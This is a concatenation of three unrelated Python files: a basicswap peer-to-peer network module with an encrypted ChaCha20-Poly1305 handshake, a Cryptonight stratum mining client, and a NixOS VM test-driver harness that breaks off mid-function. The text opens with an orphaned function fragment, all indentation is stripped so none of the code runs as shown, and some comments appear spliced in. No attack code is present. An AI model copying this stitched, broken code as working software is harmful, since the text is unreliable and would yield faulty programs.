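    import struct  # local import keeps this example self-contained
    body = struct.pack('>H', msg_type) + payload      # 2-byte msg_type, then payload
    return struct.pack('>H', 0xabcd) + struct.pack('>I', len(body)) + body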
import time
import queue
import random
import select
import socket
import struct
import hashlib
import logging
import secrets
import threading
import traceback
from enum import IntEnum, auto
from collections import OrderedDict
from Crypto.Cipher import ChaCha20_Poly1305 # TODO: Add to libsecp256k1/coincurve fork
from coincurve.keys import PrivateKey, PublicKey
from basicswap.contrib.rfc6979 import (
rfc6979_hmac_sha256_initialize,
rfc6979_hmac_sha256_generate)
START_TOKEN = 0xabcd
MSG_START_TOKEN = struct.pack('>H', START_TOKEN)
MSG_MAX_SIZE = 0x200000 # 2MB
MSG_HEADER_LEN = 8
MAX_SEEN_EPHEM_KEYS = 1000
TIMESTAMP_LEEWAY = 8
class NetMessageTypes(IntEnum):
HANDSHAKE = auto()
PING = auto()
PONG = auto()
DATA = auto()
ONION_PACKET = auto()
@classmethod
def has_value(cls, value):
return value in cls._value2member_map_
'''
class NetMessage:
def __init__(self):
self._msg_class = None # 2 bytes
self._len = None # 4 bytes
self._msg_type = None # 2 bytes
'''
# Ensure handshake keys are not reused by including the time in the msg, mac and key hash
# Verify timestamp is not too old
# Add keys to db to catch concurrent attempts, records can be cleared periodically, the timestamp should catch older replay attempts
class MsgHandshake:
__slots__ = ('_timestamp', '_ephem_pk', '_ct', '_mac')
def __init__(self):
pass
def encode_aad(self): # Additional Authenticated Data
return struct.pack('>H', NetMessageTypes.HANDSHAKE) + \
struct.pack('>Q', self._timestamp) + \
self._ephem_pk
def encode(self):
return self.encode_aad() + self._ct + self._mac
def decode(self, msg_mv):
o = 2
self._timestamp = struct.unpack('>Q', msg_mv[o: o + 8])[0]
o += 8
self._ephem_pk = bytes(msg_mv[o: o + 33])
o += 33
self._ct = bytes(msg_mv[o: -16])
self._mac = bytes(msg_mv[-16:])
class Peer:
__slots__ = (
'_mx', '_pubkey', '_address', '_socket', '_version', '_ready', '_incoming',
'_connected_at', '_last_received_at', '_bytes_sent', '_bytes_received',
'_receiving_length', '_receiving_buffer', '_recv_messages', '_misbehaving_score',
'_ke', '_km', '_dir', '_sent_nonce', '_recv_nonce', '_last_handshake_at',
'_ping_nonce', '_last_ping_at', '_last_ping_rtt')
def __init__(self, address, socket, pubkey):
self._mx = threading.Lock()
self._pubkey = pubkey
self._address = address
self._socket = socket
self._version = None
self._ready = False # True when handshake is complete
self._incoming = False
self._connected_at = time.time()
self._last_received_at = 0
self._last_handshake_at = 0
self._bytes_sent = 0
self._bytes_received = 0
self._receiving_length = 0
self._receiving_buffer = None
self._recv_messages = queue.Queue() # Built in mutex
self._misbehaving_score = 0 # TODO: Must be persistent - save to db
self._ping_nonce = 0
self._last_ping_at = 0 # ms
self._last_ping_rtt = 0 # ms
def close(self):
self._socket.close()
def listen_thread(cls):
timeout = 1.0
max_bytes = 0x10000
while cls._running:
# logging.info('[rm] network loop %d', cls._running)
readable, writable, errored = select.select(cls._read_sockets, cls._write_sockets, cls._error_sockets, timeout)
cls._mx.acquire()
try:
disconnected_peers = []
for s in readable:
if s == cls._socket:
peer_socket, address = cls._socket.accept()
logging.info('Connection from %s', address)
new_peer = Peer(address, peer_socket, None)
new_peer._incoming = True
cls._peers.append(new_peer)
cls._error_sockets.append(peer_socket)
cls._read_sockets.append(peer_socket)
else:
for peer in cls._peers:
if peer._socket == s:
try:
bytes_recv = s.recv(max_bytes, socket.MSG_DONTWAIT)
except socket.error as se:
if se.args[0] not in (socket.EWOULDBLOCK, ):
logging.error('Receive error %s', str(se))
disconnected_peers.append(peer)
continue
except Exception as e:
logging.error('Receive error %s', str(e))
disconnected_peers.append(peer)
continue
if len(bytes_recv) < 1:
disconnected_peers.append(peer)
continue
cls.receive_bytes(peer, bytes_recv)
for s in errored:
logging.warning('Socket error')
for peer in disconnected_peers:
cls.disconnect(peer)
finally:
cls._mx.release()
def msg_thread(cls):
timeout = 0.1
while cls._running:
processed = False
with cls._mx:
for peer in cls._peers:
try:
now_us = time.time_ns() // 1000
if peer._ready is True:
if now_us - peer._last_ping_at >= 5000000: # 5 seconds TODO: Make variable
cls.send_ping(peer)
msg = peer._recv_messages.get(False)
cls.process_message(peer, msg)
processed = True
except queue.Empty:
pass
except Exception as e:
logging.warning('process message error %s', str(e))
if cls._sc.debug:
logging.error(traceback.format_exc())
if processed is False:
time.sleep(timeout)
class Network:
__slots__ = (
'_p2p_host', '_p2p_port', '_network_key', '_network_pubkey',
'_sc', '_peers', '_max_connections', '_running', '_network_thread', '_msg_thread',
'_mx', '_socket', '_read_sockets', '_write_sockets', '_error_sockets', '_csprng', '_seen_ephem_keys')
def __init__(self, p2p_host, p2p_port, network_key, swap_client):
self._p2p_host = p2p_host
self._p2p_port = p2p_port
self._network_key = network_key
self._network_pubkey = PublicKey.from_secret(network_key).format()
self._sc = swap_client
self._peers = []
self._max_connections = 10
self._running = False
self._network_thread = None
self._msg_thread = None
self._mx = threading.Lock()
self._socket = None
self._read_sockets = []
self._write_sockets = []
self._error_sockets = [] # Check for error events
self._seen_ephem_keys = OrderedDict()
def startNetwork(self):
self._mx.acquire()
try:
self._csprng = rfc6979_hmac_sha256_initialize(secrets.token_bytes(32))
self._running = True
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind((self._p2p_host, self._p2p_port))
self._socket.listen(self._max_connections)
self._read_sockets.append(self._socket)
self._network_thread = threading.Thread(target=listen_thread, args=(self,))
self._network_thread.start()
self._msg_thread = threading.Thread(target=msg_thread, args=(self,))
self._msg_thread.start()
finally:
self._mx.release()
def stopNetwork(self):
self._mx.acquire()
try:
self._running = False
finally:
self._mx.release()
if self._network_thread:
self._network_thread.join()
if self._msg_thread:
self._msg_thread.join()
self._mx.acquire()
try:
if self._socket:
self._socket.close()
for peer in self._peers:
peer.close()
finally:
self._mx.release()
def add_connection(self, host, port, peer_pubkey):
self._sc.log.info('Connecting from %s to %s at %s %d', self._network_pubkey.hex(), peer_pubkey.hex(), host, port)
self._mx.acquire()
try:
address = (host, port)
peer_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
peer_socket.connect(address)
peer = Peer(address, peer_socket, peer_pubkey)
self._peers.append(peer)
self._error_sockets.append(peer_socket)
self._read_sockets.append(peer_socket)
finally:
self._mx.release()
self.send_handshake(peer)
def disconnect(self, peer):
self._sc.log.info('Closing peer socket %s', peer._address)
self._read_sockets.pop(self._read_sockets.index(peer._socket))
self._error_sockets.pop(self._error_sockets.index(peer._socket))
peer.close()
self._peers.pop(self._peers.index(peer))
def check_handshake_ephem_key(self, peer, timestamp, ephem_pk, direction=1):
# assert ._mx.acquire() ?
used = self._seen_ephem_keys.get(ephem_pk)
if used:
raise ValueError('Handshake ephem_pk reused %s peer %s' % ('for' if direction == 1 else 'by', used[0]))
self._seen_ephem_keys[ephem_pk] = (peer._address, timestamp)
while len(self._seen_ephem_keys) > MAX_SEEN_EPHEM_KEYS:
self._seen_ephem_keys.popitem(last=False)
def send_handshake(self, peer):
self._sc.log.debug('send_handshake %s', peer._address)
peer._mx.acquire()
try:
# TODO: Drain peer._recv_messages
if not peer._recv_messages.empty():
self._sc.log.warning('send_handshake %s - Receive queue dumped.', peer._address)
while not peer._recv_messages.empty():
peer._recv_messages.get(False)
msg = MsgHandshake()
msg._timestamp = int(time.time())
key_r = rfc6979_hmac_sha256_generate(self._csprng, 32)
k = PrivateKey(key_r)
msg._ephem_pk = PublicKey.from_secret(key_r).format()
self.check_handshake_ephem_key(peer, msg._timestamp, msg._ephem_pk)
ss = k.ecdh(peer._pubkey)
hashed = hashlib.sha512(ss + struct.pack('>Q', msg._timestamp)).digest()
peer._ke = hashed[:32]
peer._km = hashed[32:]
nonce = peer._km[24:]
payload = self._sc._version
nk = PrivateKey(self._network_key)
sig = nk.sign_recoverable(peer._km)
payload += sig
aad = msg.encode_aad()
aad += nonce
cipher = ChaCha20_Poly1305.new(key=peer._ke, nonce=nonce)
cipher.update(aad)
msg._ct, msg._mac = cipher.encrypt_and_digest(payload)
peer._sent_nonce = hashlib.sha256(nonce + msg._mac).digest()
peer._recv_nonce = hashlib.sha256(peer._km).digest() # Init nonce
peer._last_handshake_at = msg._timestamp
peer._ready = False # Wait for peer to complete handshake
self.send_msg(peer, msg)
finally:
peer._mx.release()
def process_handshake(self, peer, msg_mv):
self._sc.log.debug('process_handshake %s', peer._address)
# TODO: Drain peer._recv_messages
if not peer._recv_messages.empty():
self._sc.log.warning('process_handshake %s - Receive queue dumped.', peer._address)
while not peer._recv_messages.empty():
peer._recv_messages.get(False)
msg = MsgHandshake()
msg.decode(msg_mv)
try:
now = int(time.time())
if now - peer._last_handshake_at < 30:
raise ValueError('Too many handshakes from peer %s' % (peer._address,))
if abs(msg._timestamp - now) > TIMESTAMP_LEEWAY:
raise ValueError('Bad handshake timestamp from peer %s' % (peer._address,))
self.check_handshake_ephem_key(peer, msg._timestamp, msg._ephem_pk, direction=2)
nk = PrivateKey(self._network_key)
ss = nk.ecdh(msg._ephem_pk)
hashed = hashlib.sha512(ss + struct.pack('>Q', msg._timestamp)).digest()
peer._ke = hashed[:32]
peer._km = hashed[32:]
nonce = peer._km[24:]
aad = msg.encode_aad()
aad += nonce
cipher = ChaCha20_Poly1305.new(key=peer._ke, nonce=nonce)
cipher.update(aad)
plaintext = cipher.decrypt_and_verify(msg._ct, msg._mac) # Will raise error if mac doesn't match
peer._version = plaintext[:6]
sig = plaintext[6:]
pk_peer = PublicKey.from_signature_and_message(sig, peer._km)
# TODO: Should pk_peer be linked to public data?
peer._pubkey = pk_peer.format()
peer._recv_nonce = hashlib.sha256(nonce + msg._mac).digest()
peer._sent_nonce = hashlib.sha256(peer._km).digest() # Init nonce
peer._last_handshake_at = msg._timestamp
peer._ready = True
# Schedule a ping to complete the handshake, TODO: Send here?
peer._last_ping_at = 0
except Exception as e:
# TODO: misbehaving
self._sc.log.debug('[rm] process_handshake %s', str(e))
def process_ping(self, peer, msg_mv):
nonce = peer._recv_nonce[:24]
cipher = ChaCha20_Poly1305.new(key=peer._ke, nonce=nonce)
cipher.update(msg_mv[0: 2])
cipher.update(nonce)
mac = msg_mv[-16:]
plaintext = cipher.decrypt_and_verify(msg_mv[2: -16], mac)
ping_nonce = struct.unpack('>I', plaintext[:4])[0]
# Version is added to a ping following a handshake message
if len(plaintext) >= 10:
peer._ready = True
version = plaintext[4: 10]
if peer._version is None:
peer._version = version
self._sc.log.debug('Set version from ping %s, %s', peer._pubkey.hex(), peer._version.hex())
peer._recv_nonce = hashlib.sha256(nonce + mac).digest()
self.send_pong(peer, ping_nonce)
def process_pong(self, peer, msg_mv):
nonce = peer._recv_nonce[:24]
cipher = ChaCha20_Poly1305.new(key=peer._ke, nonce=nonce)
cipher.update(msg_mv[0: 2])
cipher.update(nonce)
mac = msg_mv[-16:]
plaintext = cipher.decrypt_and_verify(msg_mv[2: -16], mac)
pong_nonce = struct.unpack('>I', plaintext[:4])[0]
if pong_nonce == peer._ping_nonce:
peer._last_ping_rtt = (time.time_ns() // 1000) - peer._last_ping_at
else:
self._sc.log.debug('Pong received out of order %s', peer._address)
peer._recv_nonce = hashlib.sha256(nonce + mac).digest()
def send_ping(self, peer):
ping_nonce = random.getrandbits(32)
msg_bytes = struct.pack('>H', NetMessageTypes.PING)
nonce = peer._sent_nonce[:24]
cipher = ChaCha20_Poly1305.new(key=peer._ke, nonce=nonce)
cipher.update(msg_bytes)
cipher.update(nonce)
payload = struct.pack('>I', ping_nonce)
if peer._last_ping_at == 0:
payload += self._sc._version
ct, mac = cipher.encrypt_and_digest(payload)
msg_bytes += ct + mac
peer._sent_nonce = hashlib.sha256(nonce + mac).digest()
peer._last_ping_at = time.time_ns() // 1000
peer._ping_nonce = ping_nonce
self.send_msg(peer, msg_bytes)
def send_pong(self, peer, ping_nonce):
msg_bytes = struct.pack('>H', NetMessageTypes.PONG)
nonce = peer._sent_nonce[:24]
cipher = ChaCha20_Poly1305.new(key=peer._ke, nonce=nonce)
cipher.update(msg_bytes)
cipher.update(nonce)
payload = struct.pack('>I', ping_nonce)
ct, mac = cipher.encrypt_and_digest(payload)
msg_bytes += ct + mac
peer._sent_nonce = hashlib.sha256(nonce + mac).digest()
self.send_msg(peer, msg_bytes)
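# Note (added for clarity): both directions roll their AEAD nonce forward as
# sha256(previous_nonce + mac)[:24] after every encrypted message, so a replayed
# or dropped message makes the next decrypt_and_verify fail because the expected
# nonce in the chain no longer matches.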
def send_msg(self, peer, msg):
msg_encoded = msg if isinstance(msg, bytes) else msg.encode()
len_encoded = len(msg_encoded)
msg_packed = bytearray(MSG_START_TOKEN) + struct.pack('>I', len_encoded) + msg_encoded
peer._socket.sendall(msg_packed)
peer._bytes_sent += len_encoded
def process_message(self, peer, msg_bytes):
logging.info('[rm] process_message %s len %d', peer._address, len(msg_bytes))
peer._mx.acquire()
try:
mv = memoryview(msg_bytes)
o = 0
msg_type = struct.unpack('>H', mv[o: o + 2])[0]
if msg_type == NetMessageTypes.HANDSHAKE:
self.process_handshake(peer, mv)
elif msg_type == NetMessageTypes.PING:
self.process_ping(peer, mv)
elif msg_type == NetMessageTypes.PONG:
self.process_pong(peer, mv)
else:
self._sc.log.debug('Unknown message type %d', msg_type)
finally:
peer._mx.release()
def receive_bytes(self, peer, bytes_recv):
# logging.info('[rm] receive_bytes %s %s', peer._address, bytes_recv)
len_received = len(bytes_recv)
peer._last_received_at = time.time()
peer._bytes_received += len_received
invalid_msg = False
mv = memoryview(bytes_recv)
o = 0
try:
while o < len_received:
if peer._receiving_length == 0:
if len(bytes_recv) < MSG_HEADER_LEN:
raise ValueError('Msg too short')
if mv[o: o + 2] != MSG_START_TOKEN:
raise ValueError('Invalid start token')
o += 2
msg_len = struct.unpack('>I', mv[o: o + 4])[0]
o += 4
if msg_len < 2 or msg_len > MSG_MAX_SIZE:
raise ValueError('Invalid data length')
# Precheck msg_type
msg_type = struct.unpack('>H', mv[o: o + 2])[0]
# o += 2 # Don't inc offset, msg includes type
if not NetMessageTypes.has_value(msg_type):
raise ValueError('Invalid msg type')
peer._receiving_length = msg_len
len_pkt = (len_received - o)
nc = msg_len if len_pkt > msg_len else len_pkt
peer._receiving_buffer = mv[o: o + nc]
o += nc
else:
len_to_go = peer._receiving_length - len(peer._receiving_buffer)
len_pkt = (len_received - o)
nc = len_to_go if len_pkt > len_to_go else len_pkt
peer._receiving_buffer = bytes(peer._receiving_buffer) + bytes(mv[o: o + nc])  # append to the partial message instead of overwriting it
o += nc
if len(peer._receiving_buffer) == peer._receiving_length:
peer._recv_messages.put(peer._receiving_buffer)
peer._receiving_length = 0
except Exception as e:
if self._sc.debug:
self._sc.log.error('Invalid message received from %s %s', peer._address, str(e))
# TODO: misbehaving
def test_onion(self, path):
self._sc.log.debug('test_onion packet')
def get_info(self):
rv = {}
peers = []
with self._mx:
for peer in self._peers:
peer_info = {
'pubkey': 'Unknown' if not peer._pubkey else peer._pubkey.hex(),
'address': '{}:{}'.format(peer._address[0], peer._address[1]),
'bytessent': peer._bytes_sent,
'bytesrecv': peer._bytes_received,
'ready': peer._ready,
'incoming': peer._incoming,
}
peers.append(peer_info)
rv['peers'] = peers
return rv
|
Miner.py
|
from JsonRpc2Client import *
from Utils import *
from Cryptonight import SubscriptionCryptonight
import socket, threading, urllib.parse, math
SubscriptionByAlgorithm = {
"cryptonight": SubscriptionCryptonight,
}
class Miner(JsonRpc2Client):
"""Simple mining client"""
class MinerWarning(JsonRpc2Client.RequestReplyWarning):
def __init__(self, message, reply, request = None):
JsonRpc2Client.RequestReplyWarning.__init__(self, 'Mining State Error: ' + message, reply, request)
class MinerAuthenticationException(JsonRpc2Client.RequestReplyException): pass
def __init__(self, url, username, password, algorithm, nb_threads):
JsonRpc2Client.__init__(self)
self._url = url
self._username = username
self._password = password
self.nb_threads = nb_threads
self._subscription = SubscriptionByAlgorithm[algorithm]()
self._job = None
self._submitted_shares = 0
self._accepted_shares = 0
def handle_reply(self, request, reply):
if reply.get("method") == "job":
self._handle_job(reply)
elif request:
if request.get("method") == "submit":
self._handle_submit(reply, request)
elif request.get("method") == "login":
self._handle_login(reply)
else:
raise Exception("Bad message state - no request", reply)
else:
raise Exception("Unknown message", reply, request)
def _handle_job_msg(self, job_msg):
blob = job_msg["blob"]
job_id = job_msg["job_id"]
target = job_msg["target"]
target = "".join([target[i:i+2] for i in range(0, len(target), 2)][::-1])
difficulty = math.floor((2**32 - 1) / int(target, 16))
self._spawn_job_thread(job_id, blob, target)
log("New job: job_id={} - difficulty={}".format(job_id, difficulty), LEVEL_DEBUG)
def _handle_job(self, reply):
if "params" not in reply or len(reply["params"]) != 3:
raise self.MinerWarning("Malformed job message", reply)
self._handle_job_msg(reply["params"])
def _handle_submit(self, reply, request):
if "result" not in reply or not reply["result"]:
log("Share - Invalid", LEVEL_INFO)
raise self.MinerWarning("Failed to accept submit", reply, request)
self._accepted_shares += 1
log("Accepted shares: {} / {}".format(self._accepted_shares, self._submitted_shares), LEVEL_INFO)
def _login(self):
#TODO: define user agent properly
params = {"login": self._username, "pass": self._password, "agent": "GGMiner/0.1"}
self.send(method="login", params=params)
def _handle_login(self, reply):
if "result" not in reply or "id" not in reply["result"]:
raise self.MinerWarning('Reply to login is malformed', reply)
result = reply["result"]
id = result["id"]
log("Login success. Subscription ID={}".format(id), LEVEL_DEBUG)
self._subscription.set_subscription(id)
self._handle_job_msg(result["job"])
def _spawn_job_thread(self, job_id, blob, target):
'''Stops any previous job and begins a new job.'''
# Stop the old job (if any)
if self._job:
self._job.stop()
# Create the new job
self._job = self._subscription.create_job(
job_id = job_id,
blob = blob,
target = target
)
def run(job, nonce_start, nonce_stride):
try:
for result in job.mine(nonce_start=nonce_start, nonce_stride=nonce_stride):
self.send(method = "submit", params = result)
self._submitted_shares += 1
log("Found share: " + str(result), LEVEL_DEBUG)
log("Hashrate: {}".format(human_readable_hashrate(job.hashrate)), LEVEL_INFO)
except Exception as e:
log("ERROR: {}".format(e), LEVEL_ERROR)
for n in range(self.nb_threads):
thread = threading.Thread(target=run, args=(self._job, n, self.nb_threads))
thread.daemon = True
thread.start()
def serve_forever(self):
url = urllib.parse.urlparse(self._url)
hostname = url.hostname or ''
port = url.port
log("Starting server on {}:{}".format(hostname, port), LEVEL_INFO)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((hostname, port))
self.connect(sock)
self._login()
while True:
time.sleep(10)
|
machine.py
|
from contextlib import _GeneratorContextManager
from pathlib import Path
from queue import Queue
from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple
import base64
import io
import os
import queue
import re
import shlex
import shutil
import socket
import subprocess
import sys
import tempfile
import threading
import time
from test_driver.logger import rootlog
CHAR_TO_KEY = {
"A": "shift-a",
"N": "shift-n",
"-": "0x0C",
"_": "shift-0x0C",
"B": "shift-b",
"O": "shift-o",
"=": "0x0D",
"+": "shift-0x0D",
"C": "shift-c",
"P": "shift-p",
"[": "0x1A",
"{": "shift-0x1A",
"D": "shift-d",
"Q": "shift-q",
"]": "0x1B",
"}": "shift-0x1B",
"E": "shift-e",
"R": "shift-r",
";": "0x27",
":": "shift-0x27",
"F": "shift-f",
"S": "shift-s",
"'": "0x28",
'"': "shift-0x28",
"G": "shift-g",
"T": "shift-t",
"`": "0x29",
"~": "shift-0x29",
"H": "shift-h",
"U": "shift-u",
"\\": "0x2B",
"|": "shift-0x2B",
"I": "shift-i",
"V": "shift-v",
",": "0x33",
"<": "shift-0x33",
"J": "shift-j",
"W": "shift-w",
".": "0x34",
">": "shift-0x34",
"K": "shift-k",
"X": "shift-x",
"/": "0x35",
"?": "shift-0x35",
"L": "shift-l",
"Y": "shift-y",
" ": "spc",
"M": "shift-m",
"Z": "shift-z",
"\n": "ret",
"!": "shift-0x02",
"@": "shift-0x03",
"#": "shift-0x04",
"$": "shift-0x05",
"%": "shift-0x06",
"^": "shift-0x07",
"&": "shift-0x08",
"*": "shift-0x09",
"(": "shift-0x0A",
")": "shift-0x0B",
}
def make_command(args: list) -> str:
return " ".join(map(shlex.quote, (map(str, args))))
def _perform_ocr_on_screenshot(
screenshot_path: str, model_ids: Iterable[int]
) -> List[str]:
if shutil.which("tesseract") is None:
raise Exception("OCR requested but enableOCR is false")
magick_args = (
"-filter Catrom -density 72 -resample 300 "
+ "-contrast -normalize -despeckle -type grayscale "
+ "-sharpen 1 -posterize 3 -negate -gamma 100 "
+ "-blur 1x65535"
)
tess_args = f"-c debug_file=/dev/null --psm 11"
cmd = f"convert {magick_args} {screenshot_path} tiff:{screenshot_path}.tiff"
ret = subprocess.run(cmd, shell=True, capture_output=True)
if ret.returncode != 0:
raise Exception(f"TIFF conversion failed with exit code {ret.returncode}")
model_results = []
for model_id in model_ids:
cmd = f"tesseract {screenshot_path}.tiff - {tess_args} --oem {model_id}"
ret = subprocess.run(cmd, shell=True, capture_output=True)
if ret.returncode != 0:
raise Exception(f"OCR failed with exit code {ret.returncode}")
model_results.append(ret.stdout.decode("utf-8"))
return model_results
def retry(fn: Callable, timeout: int = 900) -> None:
"""Call the given function repeatedly, with 1 second intervals,
until it returns True or a timeout is reached.
"""
for _ in range(timeout):
if fn(False):
return
time.sleep(1)
if not fn(True):
raise Exception(f"action timed out after {timeout} seconds")
class StartCommand:
"""The Base Start Command knows how to append the necesary
runtime qemu options as determined by a particular test driver
run. Any such start command is expected to happily receive and
append additional qemu args.
"""
_cmd: str
def cmd(
self,
monitor_socket_path: Path,
shell_socket_path: Path,
allow_reboot: bool = False, # TODO: unused, legacy?
) -> str:
display_opts = ""
display_available = any(x in os.environ for x in ["DISPLAY", "WAYLAND_DISPLAY"])
if not display_available:
display_opts += " -nographic"
# qemu options
qemu_opts = ""
qemu_opts += (
""
if allow_reboot
else " -no-reboot"
" -device virtio-serial"
" -device virtconsole,chardev=shell"
" -device virtio-rng-pci"
" -serial stdio"
)
# TODO: qemu script already captures this env variable, legacy?
qemu_opts += " " + os.environ.get("QEMU_OPTS", "")
return (
f"{self._cmd}"
f" -monitor unix:{monitor_socket_path}"
f" -chardev socket,id=shell,path={shell_socket_path}"
f"{qemu_opts}"
f"{display_opts}"
)
@staticmethod
def build_environment(
state_dir: Path,
shared_dir: Path,
) -> dict:
# We make a copy to not update the current environment
env = dict(os.environ)
env.update(
{
"TMPDIR": str(state_dir),
"SHARED_DIR": str(shared_dir),
"USE_TMPDIR": "1",
}
)
return env
def run(
self,
state_dir: Path,
shared_dir: Path,
monitor_socket_path: Path,
shell_socket_path: Path,
) -> subprocess.Popen:
return subprocess.Popen(
self.cmd(monitor_socket_path, shell_socket_path),
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True,
cwd=state_dir,
env=self.build_environment(state_dir, shared_dir),
)
class NixStartScript(StartCommand):
"""A start script from nixos/modules/virtualiation/qemu-vm.nix
that also satisfies the requirement of the BaseStartCommand.
These Nix commands have the particular charactersitic that the
machine name can be extracted out of them via a regex match.
(Admittedly a _very_ implicit contract, evtl. TODO fix)
"""
def __init__(self, script: str):
self._cmd = script
@property
def machine_name(self) -> str:
match = re.search("run-(.+)-vm$", self._cmd)
name = "machine"
if match:
name = match.group(1)
return name
class LegacyStartCommand(StartCommand):
"""Used in some places to create an ad-hoc machine instead of
using nix test instrumentation + module system for that purpose.
Legacy.
"""
def __init__(
self,
netBackendArgs: Optional[str] = None,
netFrontendArgs: Optional[str] = None,
hda: Optional[Tuple[Path, str]] = None,
cdrom: Optional[str] = None,
usb: Optional[str] = None,
bios: Optional[str] = None,
qemuFlags: Optional[str] = None,
):
self._cmd = "qemu-kvm -m 384"
# networking
net_backend = "-netdev user,id=net0"
net_frontend = "-device virtio-net-pci,netdev=net0"
if netBackendArgs is not None:
net_backend += "," + netBackendArgs
if netFrontendArgs is not None:
net_frontend += "," + netFrontendArgs
self._cmd += f" {net_backend} {net_frontend}"
# hda
hda_cmd = ""
if hda is not None:
hda_path = hda[0].resolve()
hda_interface = hda[1]
if hda_interface == "scsi":
hda_cmd += (
f" -drive id=hda,file={hda_path},werror=report,if=none"
" -device scsi-hd,drive=hda"
)
else:
hda_cmd += f" -drive file={hda_path},if={hda_interface},werror=report"
self._cmd += hda_cmd
# cdrom
if cdrom is not None:
self._cmd += f" -cdrom {cdrom}"
# usb
usb_cmd = ""
if usb is not None:
# https://github.com/qemu/qemu/blob/master/docs/usb2.txt
usb_cmd += (
" -device usb-ehci"
f" -drive id=usbdisk,file={usb},if=none,readonly"
" -device usb-storage,drive=usbdisk "
)
self._cmd += usb_cmd
# bios
if bios is not None:
self._cmd += f" -bios {bios}"
# qemu flags
if qemuFlags is not None:
self._cmd += f" {qemuFlags}"
class Machine:
"""A handle to the machine with this name, that also knows how to manage
the machine lifecycle with the help of a start script / command."""
name: str
tmp_dir: Path
shared_dir: Path
state_dir: Path
monitor_path: Path
shell_path: Path
start_command: StartCommand
keep_vm_state: bool
allow_reboot: bool
process: Optional[subprocess.Popen]
pid: Optional[int]
monitor: Optional[socket.socket]
shell: Optional[socket.socket]
serial_thread: Optional[threading.Thread]
booted: bool
connected: bool
# Store last serial console lines for use
# of wait_for_console_text
last_lines: Queue = Queue()
callbacks: List[Callable]
def __repr__(self) -> str:
return f"<Machine '{self.name}'>"
def __init__(
self,
tmp_dir: Path,
start_command: StartCommand,
name: str = "machine",
keep_vm_state: bool = False,
allow_reboot: bool = False,
callbacks: Optional[List[Callable]] = None,
) -> None:
self.tmp_dir = tmp_dir
self.keep_vm_state = keep_vm_state
self.allow_reboot = allow_reboot
self.name = name
self.start_command = start_command
self.callbacks = callbacks if callbacks is not None else []
# set up directories
self.shared_dir = self.tmp_dir / "shared-xchg"
self.shared_dir.mkdir(mode=0o700, exist_ok=True)
self.state_dir = self.tmp_dir / f"vm-state-{self.name}"
self.monitor_path = self.state_dir / "monitor"
self.shell_path = self.state_dir / "shell"
if (not self.keep_vm_state) and self.state_dir.exists():
self.cleanup_statedir()
self.state_dir.mkdir(mode=0o700, exist_ok=True)
self.process = None
self.pid = None
self.monitor = None
self.shell = None
self.serial_thread = None
self.booted = False
self.connected = False
@staticmethod
def create_startcommand(args: Dict[str, str]) -> StartCommand:
rootlog.warning(
"Using legacy create_startcommand(),"
"please use proper nix test vm instrumentation, instead"
"to generate the appropriate nixos test vm qemu startup script"
)
hda = None
if args.get("hda"):
hda_arg: str = args.get("hda", "")
hda_arg_path: Path = Path(hda_arg)
hda = (hda_arg_path, args.get("hdaInterface", ""))
return LegacyStartCommand(
netBackendArgs=args.get("netBackendArgs"),
netFrontendArgs=args.get("netFrontendArgs"),
hda=hda,
cdrom=args.get("cdrom"),
usb=args.get("usb"),
bios=args.get("bios"),
qemuFlags=args.get("qemuFlags"),
)
def is_up(self) -> bool:
return self.booted and self.connected
def log(self, msg: str) -> None:
rootlog.log(msg, {"machine": self.name})
def log_serial(self, msg: str) -> None:
rootlog.log_serial(msg, self.name)
def nested(self, msg: str, attrs: Dict[str, str] = {}) -> _GeneratorContextManager:
my_attrs = {"machine": self.name}
my_attrs.update(attrs)
return rootlog.nested(msg, my_attrs)
def wait_for_monitor_prompt(self) -> str:
with self.nested("waiting for monitor prompt"):
assert self.monitor is not None
answer = ""
while True:
undecoded_answer = self.monitor.recv(1024)
if not undecoded_answer:
break
answer += undecoded_answer.decode()
if answer.endswith("(qemu) "):
break
return answer
def send_monitor_command(self, command: str) -> str:
self.run_callbacks()
with self.nested("sending monitor command: {}".format(command)):
message = ("{}\n".format(command)).encode()
assert self.monitor is not None
self.monitor.send(message)
return self.wait_for_monitor_prompt()
def wait_for_unit(self, unit: str, user: Optional[str] = None) -> None:
"""Wait for a systemd unit to get into "active" state.
Throws exceptions on "failed" and "inactive" states as well as
after timing out.
"""
def check_active(_: Any) -> bool:
info = self.get_unit_info(unit, user)
state = info["ActiveState"]
if state == "failed":
raise Exception('unit "{}" reached state "{}"'.format(unit, state))
if state == "inactive":
status, jobs = self.systemctl("list-jobs --full 2>&1", user)
if "No jobs" in jobs:
info = self.get_unit_info(unit, user)
if info["ActiveState"] == state:
raise Exception(
(
'unit "{}" is inactive and there ' "are no pending jobs"
).format(unit)
)
return state == "active"
with self.nested(
"waiting for unit {}{}".format(
unit, f" with user {user}" if user is not None else ""
)
):
retry(check_active)
def get_unit_info(self, unit: str, user: Optional[str] = None) -> Dict[str, str]:
status, lines = self.systemctl('--no-pager show "{}"'.format(unit), user)
if status != 0:
raise Exception(
'retrieving systemctl info for unit "{}" {} failed with exit code {}'.format(
unit, "" if user is None else 'under user "{}"'.format(user), status
)
)
line_pattern = re.compile(r"^([^=]+)=(.*)$")
def tuple_from_line(line: str) -> Tuple[str, str]:
match = line_pattern.match(line)
assert match is not None
return match[1], match[2]
return dict(
tuple_from_line(line)
for line in lines.split("\n")
if line_pattern.match(line)
)
def systemctl(self, q: str, user: Optional[str] = None) -> Tuple[int, str]:
if user is not None:
q = q.replace("'", "\\'")
return self.execute(
(
"su -l {} --shell /bin/sh -c "
"$'XDG_RUNTIME_DIR=/run/user/`id -u` "
"systemctl --user {}'"
).format(user, q)
)
return self.execute("systemctl {}".format(q))
def require_unit_state(self, unit: str, require_state: str = "active") -> None:
with self.nested(
"checking if unit ‘{}’ has reached state '{}'".format(unit, require_state)
):
info = self.get_unit_info(unit)
state = info["ActiveState"]
if state != require_state:
raise Exception(
"Expected unit ‘{}’ to to be in state ".format(unit)
+ "'{}' but it is in state ‘{}’".format(require_state, state)
)
def _next_newline_closed_block_from_shell(self) -> str:
assert self.shell
output_buffer = []
while True:
# This receives up to 4096 bytes from the socket
chunk = self.shell.recv(4096)
